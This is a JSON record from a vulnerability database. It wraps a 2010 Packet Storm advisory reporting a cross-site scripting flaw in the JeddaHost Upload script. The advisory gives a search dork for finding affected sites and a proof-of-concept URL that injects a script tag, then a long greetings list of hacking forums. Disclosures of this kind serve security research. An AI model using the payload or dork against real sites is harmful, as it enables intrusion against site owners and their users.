{"id": "PACKETSTORM:84777", "type": "packetstorm", "bulletinFamily": "exploit", "title": "JeddaHost Upload Cross Site Scripting", "description": "", "published": "2010-01-05T00:00:00", "modified": "2010-01-05T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/84777/JeddaHost-Upload-Cross-Site-Scripting.html", "reporter": "indoushka", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:24:24", "viewCount": 9, "enchantments": {"score": {"value": -0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/84777/jeddahost-xss.txt", "sourceData": "`======================================================================================== \n| # Title : JeddaHost Upload XSS Vulnerability \n| # Author : indoushka \n| # email : indoushka@hotmail.com \n| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) \n| # Total alerts found : 2 \n| High : 1 \n| Medium : 1 \n| Low : \n| Informational : \n| # Web Site : www.iq-ty.com \n| # Dork : Powered by JeddaHost Upload \u00e3\u00d1\u00df\u00d2 \u00ca\u00cd\u00e3\u00ed\u00e1 \u00c7\u00e1\u00e3\u00e1\u00dd\u00c7\u00ca \n| # Tested on: windows SP2 Fran\u00e7ais V.(Pnx2 2.0) + Lunix Fran\u00e7ais v.(9.4 Ubuntu) \n| # Bug : XSS \n====================== Exploit By indoushka ================================= \n# Exploit : \n \n1- XSS \n \nhttp://server/up/tellfriend/index.php/>\"><ScRiPt>alert(213771818860)</ScRiPt> \n \n================================ Dz-Ghost Team ======================================== \nGreetz : Exploit-db Team (loneferret+Exploits+dookie2000ca) \nall my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org \nRafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org \nwww.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com \nwww.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com \nwww.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org \nwww.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net \nwww.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org \nwww.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me \nwww.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) \nSoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com \nwww.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com \nwww.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com \nr1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir \nwww.mormoroth.net * www.securitywall.org * www.sec-code.com * \n------------------------------------------------------------------------------------------- \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645248687}}
{}